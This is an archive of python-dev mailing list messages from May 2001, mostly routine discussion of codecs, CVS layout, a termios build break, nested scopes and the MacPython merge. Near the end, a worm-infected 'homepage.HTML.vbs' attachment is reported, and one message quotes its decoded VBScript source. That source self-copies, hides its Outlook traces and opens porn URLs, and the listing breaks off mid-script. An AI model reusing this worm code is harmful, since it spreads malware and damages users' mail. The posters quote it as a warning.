<200105051145.GAA14831@cj20424-a.reston1.va.home.com> Message-ID: <3AF6ED27.FB2C077B@lemburg.com> Guido van Rossum wrote: > > > I've attached the patch. Due to a small reorganisation the > > patch is a little longer -- symmetry has its price at C level > > too ;-) > > Looks good on paper, so go ahead and check it in. Watch out for > potential changes caused by Tim's iter-crusade! :-) OK. I'll look into this later this week. > While you're at it, why don't you check in the rot13 codec you posted > -- it's good to have simle examples in the standard library. > It would also be cool to have codecs for common file encodings like > base64, quoted-printable, binhex, uuencode, and even hex > (binascii.hexlify). Right. I'll add these in the next few weeks -- as time comes along. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From martin at loewis.home.cs.tu-berlin.de Mon May 7 23:21:27 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 7 May 2001 23:21:27 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de> > I don't know much about modules, but would this allow Jack to check > out the main code and the MacPython code into a single work > directory (which he needs)? Using CVS modules allows to merge parts of the tree into a single sandbox. E.g. you could do macpython python/dist/src &Mac 'cvs co macpython' then would give you a dist/src directory, which also contains a Mac directory (where Mac is another module, alongside with /python, or a CVSROOT/modules entry). You could use an exclude list, e.g. macpython !PC !PCbuild !RISCOS python/dist/src &Mac What you *cannot* do is to merge modules on a per-directory basis; all files in a single directory must come from the same CVS module - you can think of ampersand modules similar to Unix mount(1)ed file systems. Regards, Martin From tim.one at home.com Tue May 8 06:14:22 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 8 May 2001 00:14:22 -0400 Subject: [Python-Dev] Help with SF bug 105470 Message-ID: An ancient bug just got (re?)discovered on c.l.py, which I entered into SF: http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470& atid=105470 This has to do w/ gross loss of precision in manifest Python float constants, if and only if a module is loaded from .pyc or .pyo format. Since's it's fp-related, and fp is tricky x-platform, I'd like some volunteers to test this before I check it in. Current CVS Python contains a dormant test case. There's a patch attached to the bug report that activates the test case, and tries to repair the problem. After the patch, the fix works if and only if test_import doesn't fail, neither after deleting all .pyc/.pyo files first, nor if run a second time w/o deleting .pyc/.pyo. Works on Win98SE, but you may have already guessed that . From tim.one at home.com Tue May 8 06:52:37 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 8 May 2001 00:52:37 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Message-ID: [Jeremy Hylton, on python-checkins] > ... > XXX When should nested scopes by made non-optional on the trunk? Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're have trouble sleeping tonight . From thomas at xs4all.net Tue May 8 12:14:20 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 12:14:20 +0200 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400 References: <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org> Message-ID: <20010508121420.Y16486@xs4all.nl> On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote: > >>>>> "JE" == Jeff Epler writes: > | Why not let us spell this as: > | class X(Y): > | from Y import foo as _sfoo, bar as _sbar > | ... > NS> This already has a meaning in Python. Paul's suggested syntax > NS> is pretty neat, IMHO. > Not if Y is a class though, right? That would currently raise an > ImportError, ... Nope: >>> class string: ... pass ... >>> from string import split >>> string >>> That could be considered a misfeature for more than one reason (like importing from non-module objects, which you now do by inserting the object into sys.modules) but can't be fixed without breaking backward compatibility, except by inventing new syntax. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From Mark.Favas at per.dem.csiro.au Tue May 8 12:34:37 2001 From: Mark.Favas at per.dem.csiro.au (Favas, Mark (EM, Floreat)) Date: Tue, 8 May 2001 18:34:37 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> A change to termios.c in the last couple of days to #include termio.h as well as termios.h breaks the build on FreeBSD, which has only termios.h - needs an autoconf test? There'll probably be other similar systems. Cheers, Mark From thomas at xs4all.net Tue May 8 13:36:38 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 13:36:38 +0200 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: ; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: <20010508133638.Z16486@xs4all.nl> On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote: > Given the new dict iterators in 2.2, there's an easier fast way that doesn't > mutate the dict even under the covers: > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") You probably want: arb = dict.iteritems().next so that you don't keep on returning the same key,value pair. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Tue May 8 14:10:00 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:10:00 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200 References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <20010508141000.A16486@xs4all.nl> On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote: > The Mac specific stuff for Python is all concentrated in a single subtree Mac > of the main Python tree (the subtree has its own hierarchy of > Python/Modules/Lib/etc directories), so putting it in the main repository > should not pollute the filenamespace all that much. It would also have the > advantage that a single "cvs update" would update everything (whereas the > current situation for Mac developers, where Python/Mac is from a different > CVSROOT than Python, does not have that advantage). The downside is that > everyone who does a full checkout of the tree would get an extra 1000 or so > files on their disk that are pretty useless unless they have a mac. I'd say merge, except that the number '1000' is very large. Is it really 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 .py files spread out over the tree (567 of which in Lib, the rest in Demo/Tools) and obviously some misc files and CVS stuff, for a total of around 2500 files. Is that 1000 a real number ? No temp files, auto-generated files, .o files etc ? How large are they ? (the average size in the current CVS tree is about 10k) I'd probably still say 'merge', I'm just curious where the large number of files comes from. Is it to keep the changes to the original files minimal ? Given the number of platform-dependant #ifdefs and differently-defined macro's we're using now, I don't see why some of those changes couldn't be moved into the original files, if that's the case. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Tue May 8 14:13:39 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:13:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200 References: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> Message-ID: <20010508141339.B16486@xs4all.nl> On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote: > > We have platform-specific subdirectories for so many projects that > > it's a shame we don't have the Mac code in there as well! > Great! I'll pack up my repository and send it to the > sourceforge-powers-that-be shortly. The write permission for other MacPython > developers shouldn't be a problem, I think Just is currently the only person > with write permission (but I have to check). That doesn't mean there isn't a problem. Just doesn't have write access :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido at digicool.com Tue May 8 15:35:50 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:35:50 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400." References: Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com> > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes by made non-optional on the trunk? [Tim] > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > have trouble sleeping tonight . +1. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Tue May 8 15:41:42 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:41:42 -0500 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800." <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com> > A change to termios.c in the last couple of days to #include termio.h as > well as termios.h breaks the build on FreeBSD, which has only termios.h - > needs an autoconf test? There'll probably be other similar systems. Frankly, I don't see the point of including termio.h at all -- it seems to be a backwards compatibility file. Mark, can you please enter this in the bug database and assign it to whoever checked in the change? :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Tue May 8 16:05:01 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 8 May 2001 07:05:01 -0700 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: ; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400 References: Message-ID: <20010508070501.A25794@glacier.fnational.com> Tim Peters wrote: > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes by made non-optional on the trunk? > > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > have trouble sleeping tonight . Shouldn't the entry in the __future__ file be: nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) or am I misunderstanding something? Neil From jack at oratrix.nl Tue May 8 16:07:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Tue, 08 May 2001 16:07:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Thomas Wouters , Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl> > I'd say merge, except that the number '1000' is very large. Is it really > 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 > .py files spread out over the tree (567 of which in Lib, the rest in > Demo/Tools) and obviously some misc files and CVS stuff, for a total of > around 2500 files. Is that 1000 a real number ? No temp files, > auto-generated files, .o files etc ? How large are they ? (the average size > in the current CVS tree is about 10k) It's actually 830 files. This is 320 .py files (130 in Lib, the rest in Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build system), 30 resource files and then assorted things (html documentation, scripts to drive the distribution builder, etc). The .xml and .exp files and about 20 of the .c files are machine generated, so they could technically be left out of the repository. The generation process of these files is a bit painful, though, so I've added them as a convenience (the reasoning is a bit along the lines of the Grammar stuff of the core). The one thing that I should do is clean out the "Unsupported" directory before doing the merge. It contains some stuff that is long dead. But then, it isn't all that many files. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From mwh at python.net Tue May 8 16:41:45 2001 From: mwh at python.net (Michael Hudson) Date: Tue, 8 May 2001 15:41:45 +0100 (BST) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: Guido van Rossum writes: > > A change to termios.c in the last couple of days to #include termio.h > > as well as termios.h breaks the build on FreeBSD, which has only > > termios.h - needs an autoconf test? There'll probably be other similar > > systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. If you don't include termio.h the build breaks on alpha/OSF1. This sounds to me like OSF1's headers are broken (you can't include sys/ioctl.h without including termio.h first, it seems, or you get complaints about struct termio being undefined). So I'd suggest +#ifdef __osf__ #include +#endif and then see if the build breaks anywhere else (I love unix). Using the sf compile farm, I've tested this on FreeBSD, Linux/x86, Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives a pile of warnings from redefined macros and then dies 'cause it can't find a valiud license file). So we might need some more magic for solaris using cc. Cheers, M. -- Imagine if every Thursday your shoes exploded if you tied them the usual way. This happens to us all the time with computers, and nobody thinks of complaining. -- Jeff Raskin From fdrake at acm.org Tue May 8 16:45:18 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 8 May 2001 10:45:18 -0400 (EDT) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: References: Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Michael Hudson writes: > If you don't include termio.h the build breaks on alpha/OSF1. This > sounds to me like OSF1's headers are broken (you can't include > sys/ioctl.h without including termio.h first, it seems, or you get > complaints about struct termio being undefined). So I'd suggest > > +#ifdef __osf__ > #include > +#endif > > and then see if the build breaks anywhere else (I love unix). Does it make more sense to do this or to test for termio.h in configure? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From m.favas at per.dem.csiro.au Tue May 8 16:47:39 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Tue, 08 May 2001 22:47:39 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com> Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au> Guido van Rossum wrote: > > > A change to termios.c in the last couple of days to #include termio.h as > > well as termios.h breaks the build on FreeBSD, which has only termios.h - > > needs an autoconf test? There'll probably be other similar systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. > > Mark, can you please enter this in the bug database and assign it to > whoever checked in the change? :-) Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred Drake -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From thomas at xs4all.net Tue May 8 17:52:49 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 17:52:49 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200 References: <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <20010508175248.E16486@xs4all.nl> On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote: [ Jack wants to add the +/- 1000 extra files from the MacPython source tree to the Python CVS repository ] > It's actually 830 files. This is 320 .py files (130 in Lib, the rest in > Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build > system), 30 resource files and then assorted things (html documentation, > scripts to drive the distribution builder, etc). I'd say merge it. If there had been decent CVS clients for the mac when you started, those files would have been in the CVS tree already. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From skip at pobox.com Tue May 8 20:22:17 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 8 May 2001 13:22:17 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl> References: <20010508141000.A16486@xs4all.nl> <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <15096.14681.773554.729550@beluga.mojam.com> Jack> It's actually 830 files. ... 120 .c/.h files ... How many of those 120 files are variants of existing source files that (in theory) could be merged with their mainline counterparts? Skip From mwh at python.net Wed May 9 00:27:59 2001 From: mwh at python.net (Michael Hudson) Date: 08 May 2001 23:27:59 +0100 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)" References: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > If you don't include termio.h the build breaks on alpha/OSF1. This > > sounds to me like OSF1's headers are broken (you can't include > > sys/ioctl.h without including termio.h first, it seems, or you get > > complaints about struct termio being undefined). So I'd suggest > > > > +#ifdef __osf__ > > #include > > +#endif > > > > and then see if the build breaks anywhere else (I love unix). > > Does it make more sense to do this or to test for termio.h in > configure? If you're asking *me*, I have no idea. I'd hope that no system would be as broken as osf1 is in this regard, but then I'd have hoped that osf1 wasn't this broken too... I guess the test in configure is "safer" in some sense. Getting this perfectly right would probably require more autoconf hackery than one can possibly imagine... ncurses generates an amk script from ./configure that is then run to produce term.h, but I'm not sure that all of that is devoted to including the right headers. can-we-just-have-TERMIOS-back?-ly y'rs M. -- Good? Bad? Strap him into the IETF-approved witch-dunking apparatus immediately! -- NTK now, 21/07/2000 From tim.one at home.com Wed May 9 08:48:12 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 02:48:12 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: <20010508133638.Z16486@xs4all.nl> Message-ID: [Tim] > Given the new dict iterators in 2.2, there's an easier fast way > that doesn't mutate the dict even under the covers: > > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") [Thomas Wouters] > You probably want: > > arb = dict.iteritems().next > > so that you don't keep on returning the same key,value pair. No, I would not want that. If "arbitrary" suffices, then by defn. *any* element is "good enough". If it's not good enough to get the same one back every time, then I want a stronger guarantee about what arb() returns than the inexplicable behavior of repeated calls to dict.iteritems().next in the presence of dict mutation. But as I've said several times before , I'm still asking for an algorithm where arb() is actually useful (as opposed to .popitem(), which is dead easy to explain in the presence of mutation; your version of arb() can, e.g., return a given entry more than once, may skip entries, and may raise StopIteration with unexamined entries remaining in the dict). not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly y'rs - tim From tim.one at home.com Wed May 9 09:42:00 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 03:42:00 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au> Message-ID: [Mark Favas] > Changes in the last few hours (hi Tim!) Hi Mark! Sorry about that! > to stringobject compile (I'd guess) on MS You guess right -- and under two flavors of Windows . > (and on Compaq's Tru64 compiler), Figures. > but produce the following with gcc on Solaris and FreeBSD: > > gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include > -DHAVE_CONFIG_H -o Objects/stringobject.o Objects/stringobject.c > Objects/stringobject.c: In function `PyString_FromStringAndSize': > Objects/stringobject.c:76: invalid lvalue in unary `&' > Objects/stringobject.c:80: invalid lvalue in unary `&' > Objects/stringobject.c: In function `PyString_FromString': > Objects/stringobject.c:130: invalid lvalue in unary `&' > Objects/stringobject.c:134: invalid lvalue in unary `&' > *** Error code 1 Fair enough: I tried to use a cast as an lvalue in those 4 places, all of the form: PyString_InternInPlace(&(PyObject *)op); where op is declared PyStringObject*. Strictly speaking, that ain't legal, but changing it to: PyObject *t = (PyObject *)op; PyString_InternInPlace(&t); is. You may wonder WTF the difference is. That's easy: the rewrite doesn't use a cast expression as an lvalue . sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs - tim From jack at oratrix.nl Wed May 9 10:16:29 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 09 May 2001 10:16:29 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by , Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl> > > Jack> It's actually 830 files. ... 120 .c/.h files ... > > How many of those 120 files are variants of existing source files that (in > theory) could be merged with their mainline counterparts? None (unless you would count macmodule.c as a variant of posixmodule.c). I think macmain.c started out as a clone of pythonmain.c, but I think they're too different to merge (but I'll have a look). Hmm, now that I think of it macmodule and posixmodule could possibly be merged. It's fun to see how much statistics I gather about MacPython in just a few days:-) -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From tim.one at home.com Wed May 9 10:20:12 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 04:20:12 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: <20010508070501.A25794@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Shouldn't the entry in the __future__ file be: > > nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) > > or am I misunderstanding something? Until nested_scopes *is* the rule, the Mandatory Release field is just a guess about the future. Changing it to (2, 2, 0, "alpha", 0) right *now* would be wrong, since it would change it from a guess about the future to a false statement about the present. It must be changed when nested_scopes become mandatory; it needn't be changed before then (unless we delay making them mandatory beyond 2.2 final), although if somebody thinks they have a good use for moving the guess up, fine, just so long as they don't move the guess to or before 2.2a0. From thomas at xs4all.net Wed May 9 10:58:50 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 10:58:50 +0200 Subject: [Python-Dev] Crashes w/ CVS tree Message-ID: <20010509105850.F16486@xs4all.nl> I'm getting a crash with Python compiled from a freshly updated CVS tree, even when running just './python'. It crashes during the loading of os.pyc. It doesn't crash if I start python with -S, and it doesn't crash if I remove *.pyc first: centurion:~/python/python-2.2/dist/src/linux> ./python Python 2.2a0 (#4, May 9 2001, 09:52:29) [GCC 2.95.4 20010506 (Debian prerelease)] on linux2 Type "copyright", "credits" or "license" for more information. >>> centurion:~/python/python-2.2/dist/src/linux> ./python Segmentation fault If I remove os.pyc only, I get the enlightning: Fatal Python error: PyString_InternInPlace: strings only please! Abort (core dumped) I would blame Tim , except that when examining the corefile I found some pointers to other causes. The 'original' crash occurs because cmp_outcome() is passed an invalid PyObject, with most of its function slots pointing to the middle of the glibc-internal '__morecore()' function. Examining the stack off of which the invalid item was popped reveals that the next-to-last item is an iterator. So maybe I should blame Guido instead, either for the iterator or for rich comparisons ;) From thomas at xs4all.net Wed May 9 11:14:32 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 11:14:32 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112 In-Reply-To: ; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700 References: <20010509105850.F16486@xs4all.nl> Message-ID: <20010509111432.G16486@xs4all.nl> On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Objects > In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects > > Modified Files: > stringobject.c > Log Message: > Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to > restore correct semantics. This apparently fixed my problem: On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote: > > I'm getting a crash with Python compiled from a freshly updated CVS tree, > even when running just './python'. It crashes during the loading of os.pyc. > It doesn't crash if I start python with -S, and it doesn't crash if I remove > *.pyc first: That ought to teach me to spend my morning doing something fun -- it turned out to be useless :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Wed May 9 11:29:31 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 05:29:31 -0400 Subject: [Python-Dev] Crashes w/ CVS tree In-Reply-To: <20010509105850.F16486@xs4all.nl> Message-ID: [Thomas Wouters] > I'm getting a crash with Python compiled from a freshly updated CVS > tree,even when running just './python'. I did too, for a little while, but it's gone away. > ... > Fatal Python error: PyString_InternInPlace: strings only please! > Abort (core dumped) > > I would blame Tim , I would too. Please update, and if stringobject.c changes, try again. I'm sure this is my fault, but I'm too sleepy to figure out why, and I did change *something* at random that appeared to make it go away . it's-all-gcc's-fault-ly y'rs - tim From Greg.Wilson at baltimore.com Wed May 9 17:49:29 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 11:49:29 -0400 Subject: [Python-Dev] Homepage Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Hi! You've got to see this page! It's really cool ;O) -------------- next part -------------- A non-text attachment was scrubbed... Name: homepage.HTML.vbs Type: application/octet-stream Size: 2419 bytes Desc: not available URL: From guido at digicool.com Wed May 9 19:08:22 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 12:08:22 -0500 Subject: [Python-Dev] Homepage In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400." <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Greg Wilson's computer was infected by a virus which got propagated to python-dev. Do NOT open the attachment! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at pythonware.com Wed May 9 18:12:00 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 9 May 2001 18:12:00 +0200 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid> Greg's mail program wrote: > Hi! > > You've got to see this page! It's really cool ;O) > Content-Type: application/octet-stream; > name="homepage.HTML.vbs" > Content-Transfer-Encoding: quoted-printable > Content-Disposition: attachment; > filename="homepage.HTML.vbs" when will we see the first "homepage.HTML.py" virus? Cheers /F From esr at thyrsus.com Wed May 9 18:20:24 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 9 May 2001 12:20:24 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500 References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <20010509122024.A416@thyrsus.com> Guido van Rossum : > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Some of us -- heh, heh -- aren't vulnerable to attachment trojans. I could almost (not quite, but almost) love the crackers and script kiddiez of the world for what they're doing to Microsoft... -- Eric S. Raymond We shall not cease from exploration, and the end of all our exploring will be to arrive where we started and know the place for the first time. -- T.S. Eliot From fdrake at cj42289-a.reston1.va.home.com Wed May 9 18:21:27 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:21:27 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update of the maintenance branch (for Python 2.1.1). From barry at digicool.com Wed May 9 18:23:26 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 9 May 2001 12:23:26 -0400 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <15097.28414.354061.170478@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Greg Wilson's computer was infected by a virus which got GvR> propagated to python-dev. Do NOT open the attachment! Darn, and I was just finishing up the vbs.el script so my XEmacs/VM reader could open it. share-the-pain-share-the-fun-ly y'rs, -Barry From fdrake at cj42289-a.reston1.va.home.com Wed May 9 18:47:27 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:47:27 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update of the development branch (for Python 2.2). From pedroni at inf.ethz.ch Wed May 9 19:12:20 2001 From: pedroni at inf.ethz.ch (Samuele Pedroni) Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST) Subject: [Python-Dev] Homepage Message-ID: <200105091712.TAA05172@core.inf.ethz.ch> Hi. [GvR] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Here's the beast ("decrypted" and in a cage): ("decrypted" and in a cage): (we got it also on the old jpython-interest) MS has really increased computer usability, when I was younger (and I'm not that old) one bad guy had to use assembler to cause some damage, now thanks to MS, that don't cares much about security but likely a lot about self-confindence, everybody can feel very clever and proud writing such things ... and spamming the whole internet. On Error Resume Next Set WS = CreateObject("WScript.Shell") Set FSO= Createobject("scripting.filesystemobject") Folder=FSO.GetSpecialFolder(2) Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1) Do While InF.AtEndOfStream<>True ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf Loop Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true) OutF.write ScriptBuffer OutF.close Set FSO=Nothing If WS.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If Set s=CreateObject("Outlook.Application") Set t=s.GetNameSpace("MAPI") Set u=t.GetDefaultFolder(6) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).close u.Items.Item(i).delete End If Next Set u=t.GetDefaultFolder(3) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).delete End If Next Randomize r=Int((4*Rnd)+1) If r=1 then WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm") elseif r=2 Then WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm") elseif r=3 Then 